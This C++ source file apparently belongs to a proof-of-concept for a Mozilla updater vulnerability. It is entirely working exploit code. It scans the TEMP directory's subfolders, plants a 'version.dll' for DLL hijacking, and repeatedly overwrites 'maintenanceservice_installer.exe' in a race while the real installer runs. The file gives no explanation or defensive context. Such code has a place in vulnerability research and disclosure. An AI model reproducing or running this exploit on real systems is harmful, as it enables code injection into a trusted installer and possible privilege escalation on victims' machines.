MozillaVulnerability.zip/write_file/main.cpp
#include <cstdio>
#include <string>
#include <vector>
#include <iterator>
#include <algorithm>
struct IUnknown; // C2760
#include <Windows.h>
#include <Shlwapi.h>
#pragma comment(lib, "Shlwapi.lib")
std::vector<std::wstring> getTempDirectoryPath() {
std::wstring path;
path.resize(MAX_PATH + 1);
::GetEnvironmentVariableW(L"TEMP", &path.front(), static_cast<DWORD>(path.size() - 1));
path.resize(::wcslen(&path.front()));
path.append(L"\\");
const std::wstring pattern = path + L"*";
WIN32_FIND_DATA fd;
const HANDLE handle = ::FindFirstFileW(&pattern.front(), &fd);
std::vector<std::wstring> list;
do {
const std::wstring dir = path + fd.cFileName;
if (!::PathIsDirectory(&dir.front())) {
continue;
}
list.push_back(dir);
} while (::FindNextFileW(handle, &fd));
::FindClose(handle);
return list;
}
unsigned int GetFileSize(const std::wstring &path) {
WIN32_FIND_DATAW data;
HANDLE handle = ::FindFirstFileW(&path.front(), &data);
if (handle == INVALID_HANDLE_VALUE) {
return 0;
}
::FindClose(handle);
return data.nFileSizeLow;
}
int main() {
while (true) {
::wprintf(L"waiting...\n");
std::wstring path;
while (true) {
for (const auto item : getTempDirectoryPath()) {
const std::wstring versionDll = item + L"\\core\\version.dll";
if (0 != ::CopyFileW(L".\\version.dll", &versionDll.front(), true)) {
::wprintf(L"injection!\n");
continue;
}
const std::wstring path = item + L"\\core\\maintenanceservice_installer.exe";
if (0 == ::CopyFileW(L".\\maintenanceservice_installer.exe", &path.front(), false)) {
continue;
}
::wprintf(L"injection!\n");
unsigned int size = ::GetFileSize(path);
while (true) {
const unsigned int tempSize = ::GetFileSize(path);
if (size == tempSize) {
::Sleep(16);
continue;
}
if (0 == ::CopyFileW(L".\\maintenanceservice_installer.exe", &path.front(), false)) {
break;
}
::wprintf(L"retry!\n");
}
}
::Sleep(16);
}
}
return 0;
}